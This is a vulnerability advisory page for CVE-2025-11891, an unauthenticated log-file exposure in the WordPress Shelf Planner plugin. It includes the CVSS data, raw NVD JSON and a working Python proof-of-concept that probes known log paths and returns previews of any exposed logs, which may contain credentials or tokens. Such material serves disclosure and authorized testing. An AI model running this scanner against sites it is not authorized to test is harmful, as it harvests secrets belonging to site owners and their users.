Security Vulnerability Report
CVE-2025-11891 CVSS 5.3 MEDIUM

CVE-2025-11891

Published: 2025-11-11 04:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Shelf Planner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Shelf Planner插件 <= 2.8.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
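# CVE-2025-11891 PoC - Sensitive Information Exposure via Log Files
# Target: WordPress Shelf Planner Plugin <= 2.8.1
# Author: Security Researcher
# Description: This PoC demonstrates how to access exposed log files

import requests
import sys
from urllib.parse import urljoin

# Candidate locations checked for a publicly readable log file.
LOG_PATHS = (
    '/wp-content/plugins/shelf-planner/logs/debug.log',
    '/wp-content/plugins/shelf-planner/logs/error.log',
    '/wp-content/plugins/shelf-planner/logs/shelf-planner.log',
    '/wp-content/uploads/shelf-planner/debug.log',
    '/wp-content/uploads/shelf-planner/logs/debug.log',
    '/wp-content/debug.log',
    '/wp-content/uploads/shelf-planner.log',
    '/wp-content/plugins/shelf-planner/log.txt',
)

# Strings whose presence in a response body is taken as "looks like a log".
# This is a heuristic only: an ordinary WordPress HTML page also contains
# several of these words, which is why HTML bodies and redirects are
# excluded before the keyword test is applied.
LOG_KEYWORDS = (
    'error', 'warning', 'debug', 'exception', 'stack trace',
    'sql', 'query', 'wordpress', 'php', 'mysql',
)

# Number of characters of a detected log kept in the returned preview.
PREVIEW_CHARS = 500


def _looks_like_log(response):
    """Return True if *response* plausibly carries a plain-text log body.

    A theme's custom 404 page or the site home page may be served with
    status 200 and would satisfy the keyword heuristic on its own, so any
    ``text/html`` response is rejected first.
    """
    content_type = response.headers.get('Content-Type', '').lower()
    if 'text/html' in content_type:
        return False
    lowered = response.text.lower()
    return any(keyword in lowered for keyword in LOG_KEYWORDS)


def check_vulnerability(target_url, *, verify=True):
    """
    Check if the target is vulnerable to CVE-2025-11891.

    Args:
        target_url: Base URL of the WordPress site, including the scheme.
        verify: TLS certificate verification setting handed to ``requests``.
            Verification stays on by default; disabling it silently accepts
            any certificate and exposes the tester's own traffic to
            interception, so pass ``False`` only for a lab host with a
            self-signed certificate.

    Returns:
        A ``(vulnerable, exposed_logs)`` tuple. ``exposed_logs`` is a list of
        dicts with ``url``, ``size`` (response body length in bytes) and
        ``preview`` (first ``PREVIEW_CHARS`` characters) for every reachable
        log-like file. Only URL and size are printed; log contents may hold
        credentials or tokens, so the preview is returned to the caller
        rather than echoed to the console.
    """
    print(f"[*] Testing target: {target_url}")
    print("[*] Checking for exposed log files...")

    exposed_logs = []

    for log_path in LOG_PATHS:
        full_url = urljoin(target_url, log_path)
        try:
            # allow_redirects=False: following a redirect to the home page
            # (200 + HTML) would otherwise turn into a false positive.
            response = requests.get(
                full_url,
                timeout=10,
                verify=verify,
                allow_redirects=False,
            )
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {full_url}: {e}")
            continue

        if response.status_code != 200:
            continue

        if not _looks_like_log(response):
            print(f"[*] Found file (not log): {full_url}")
            continue

        size = len(response.content)
        print(f"[+] VULNERABLE: {full_url}")
        print(f"    Content length: {size} bytes")
        exposed_logs.append({
            'url': full_url,
            'size': size,
            'preview': response.text[:PREVIEW_CHARS],
        })

    vulnerable = bool(exposed_logs)
    if vulnerable:
        print("\n[!] Target is VULNERABLE to CVE-2025-11891")
        print(f"[!] Found {len(exposed_logs)} exposed log files")
        print("[*] Log contents are not printed; previews are returned to the caller")
    else:
        print("\n[-] Target does not appear to be vulnerable")

    return vulnerable, exposed_logs


def main():
    """Command-line entry point: ``python cve-2025-11891-poc.py <target_url>``."""
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11891-poc.py <target_url>")
        print("Example: python cve-2025-11891-poc.py http://example.com")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    vulnerable, logs = check_vulnerability(target)

    if vulnerable:
        print(f"\n[*] Review the {len(logs)} exposed log file(s) for sensitive information")
        print("[*] Possible sensitive data includes:")
        print("    - Database credentials")
        print("    - API keys and tokens")
        print("    - File paths and server configuration")
        print("    - User session information")
        print("    - Debug information")


if __name__ == '__main__':
    main()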

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11891", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:44.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shelf Planner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://wordpress.org/plugins/shelf-planner/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17f17cae-f444-4fa1-9090-ec6ea267ef2e?source=cve", "source": "[email protected]"}]}}